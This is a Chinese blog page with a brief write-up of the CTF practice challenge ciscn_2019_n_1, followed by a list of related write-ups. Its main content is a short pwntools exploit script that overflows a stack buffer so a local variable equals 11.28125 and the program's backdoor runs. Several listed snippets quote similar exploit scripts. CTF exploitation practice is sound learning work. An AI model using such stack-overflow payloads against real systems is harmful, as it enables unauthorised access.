ciscn_2019_n_1

最新推荐文章于 2024-01-21 14:24:20 发布

前方是否可导？

最新推荐文章于 2024-01-21 14:24:20 发布

阅读量541

点赞数

分类专栏： pwn

本文链接：https://blog.csdn.net/weixin_44110537/article/details/108249391

版权

pwn 专栏收录该内容

1 篇文章 0 订阅

订阅专栏

在这里插入图片描述

溢出覆盖掉v2为11.28125的存储形式从而打开后门.

from pwn import *

p=remote('xxxxxxxxxx',xxxxx)

payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000)

p.recvuntil('Let\'s guess the number.')

p.sendline(payload)

p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

前方是否可导？

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF—ciscn_2019_n_1 1

qq_41560595的博客

09-24

4487

这道题是栈溢出题型，又不同于一般的栈溢出，在此做个总结。查看权限拖入IDA，F5可用函数解题思路：这道题的意思是输入字符串v1，判断v2。考虑输入长字符串覆盖到存储v2的内存空间，把v2的值改掉。因此，覆盖0x30-0x4=44个字节给v1，另外4个字节给v2 由于v2数值在内存中以16进制存储，所以，找到11.28125的16进制值。存在两个比较指令，双击进去。 0x41348000就是16进制的11.28125。编写脚本 from pwn import * p=remote('

初学pwn-BUUCTF(ciscn_2019_n_1)

天柱的博客

08-31

682

初学pwn-writeUp BUUCTF的第四道题，ciscn-2019_n_1。首先还是链接远端查看一下。这里提示让猜一个数字，然后他告诉我们，这个数字应该是11.28125。这就有点掩耳盗铃了呀，但是输入了11.28125，还是在说应该输入11.28125。可能是有点问题，ida打开查看一下。可以看到主函数里，调用了三个函数，前两个都是set某个值，我们直接看func函数。那这就很明显了，刚刚输入的值赋给了v1，但是这里是要让v2的值等于11.28125才可以。查看一下地址。嗯，跟想象

参与评论您还未登录，请先登录后发表或查看评论

2021_09_15_ciscn_2019_n_1

m0_51187558的博客

09-15

2876

ciscn_2019_n_1 前言每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。大家都应该尝试着做过了上一道，也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样，目前pwn题的核心是通过漏洞挖掘与利用来提权，而nc这道题可以说是不需要任何漏洞的挖掘与利用，做出这道题并不代表你已经入门pwn了。虽然如此，从ciscn_2019_n_1这道题开始，我们真正要开始尝试迈过pwn题的那一道门槛，面对一些简单的漏洞进行利用了。做题流程

[BUUCTF]PWN------ciscn_2019_n_1

BangSen1的博客

01-16

302

ciscn_2019_n_1 例行检查，64bit，NX保护开启运行一下，没有信息 64位IDA打开，看到了cat flag ，跟进瞧瞧函数显示，当v2等于11.28125时，得到flag，但要求我们输入的是v1，所以我们只有把v1和v2 之间全部填满之后紧接着写入11.28125即可。我们可以看到这两个之间的大小为0x2C 再将11.28125转换为内存中的16进制，结果为 0x41348000 摘自 exp 得到FLAG ...

ciscn_2019_n_3

12-30

ciscn(全国大学生信息安全竞赛)，2019年的一道题目，涉及到fastbin堆漏洞的利用。由于调用了system函数，所以漏洞利用的难度不大，推荐初学者练习。题解链接：...

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

595

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

Pwn-Ciscn_2019_Final

fayinq的博客

03-11

414

Ciscn_2019_Final 感觉是一道很好的堆题，使用了很多技巧以及做题思路，包括了uaf，_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析： main函数： init函数：沙箱：（少截取一点为无所谓） allocate函数：这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数： del有一段特殊判定，就是bool的判定，因为bool的存在，导致了没有办法连续释放i

BUU ciscn_2019_n_1

xieyichensss的博客

03-19

412

**BUUOJ ciscn_2019_n_1** （今天来晚了，嘿嘿，出去唱歌了，被淋成落汤鸡） 1.老规矩，将其checksec和file一下，发现NX保护被打开了，且是64为的ELF文件。 2.那就放入IDA64内分析，按fn+F5查看c的代码，发现一个func（）的函数，双击进入 cat flag直接映入眼帘，我tm直接暗喜，有后门函数了诶，那就不慌了，直接看c的代码。 3.要想将后门函数覆盖到返回地址，那就必须要v2=11.28125，可是又没有v2的gets函数，我们...

pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0

LSYZWF的博客

10-26

623

文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目题目链接：https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析发现函数gets和系统命令cat 此函数的大致意思是输入v1的值，然后判断v2，故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波没有堆栈溢出保护 4、编写脚本 11.28125的十六进制可以在I

以题目：ciscn_2019_n_1来详细学习dbg和pwntools

最新发布

WdIg-2023的博客

01-21

1245

我们在做Linux平台下的pwn题目的时候，调试是必不可少的一步，在调试的过程中找到漏洞并用pwntools写出攻击脚本。

BUU CTF PWN ciscn_2019_n_1 WriteUp

m0sway的博客

02-28

271

BUU CTF PWN题ciscn_2019_n_1的WriteUp

[BUUCTF-PWN] ciscn_2019_n_1

m0_46098032的博客

01-04

301

下载文件，checksec看一下。用IDA64打开文件，找到main函数，F5查看。双击进去func函数。输入的数传给v1，但是需要使v2=11.28125才能获得flag。我们查看一下v1和v2的栈信息。因此我们可以利用gets先覆盖到v2的部分，再跟上11.28125的十六进制数即可成功获取flag。 11.28125的16进制为0x41348000。 exp如下： from pwn import * p = remote('node4.buuoj.cn',

[BUUCTF-pwn]——ciscn_2019_n_1

Y_peak的博客

01-31

1102

[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址题目地址：https://buuoj.cn/challenges#ciscn_2019_n_1 题目：老规矩下载下来后，在Linux上checksec一下，64位，并且没有开启栈保护，意味着我们可以利用栈溢出在IDA中看一下，main函数里面没有什么可以利用的双击func函数看看，就是我们想要的。思路一 —— 覆盖局部变量

【BUUCTF - PWN】ciscn_2019_n_1

古月浪子的博客

03-19

3597

checksec一下 IDA打开，发现如果满足的条件达成，就能get flag 找到栈溢出漏洞，输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...

ciscn_2019_c_1

09-12

根据您提供的引用内容和，题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构，用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大，适合初学者练习。根据的代码分析，题目的主函数是"main"函数。它首先打印了一些欢迎信息，在一个无限循环中等待用户输入指令。根据用户输入的指令来执行相应的功能。当用户输入为1时，调用"encrypt"函数进行加密操作。当用户输入为2时，提示用户自己进行操作。当用户输入为3时，退出程序。其他输入会提示输入错误。根据的代码分析，"encrypt"函数用于对用户输入的明文进行加密操作。在函数内部，首先定义了一个字符数组"s"用于存储用户输入的明文。然后使用gets函数获取用户输入，存在栈溢出的漏洞。接下来，对用户输入的明文进行加密操作。根据输入的字符的ASCII值的范围，使用不同的异或值进行加密。最后将加密后的密文打印出来。综上所述，题目"ciscn_2019_c_1"是一个涉及fastbin堆漏洞利用的题目。在主函数中，根据用户输入的指令来执行相应的功能，包括调用"encrypt"函数进行加密操作。"encrypt"函数中存在栈溢出漏洞，并对用户输入的明文进行加密操作。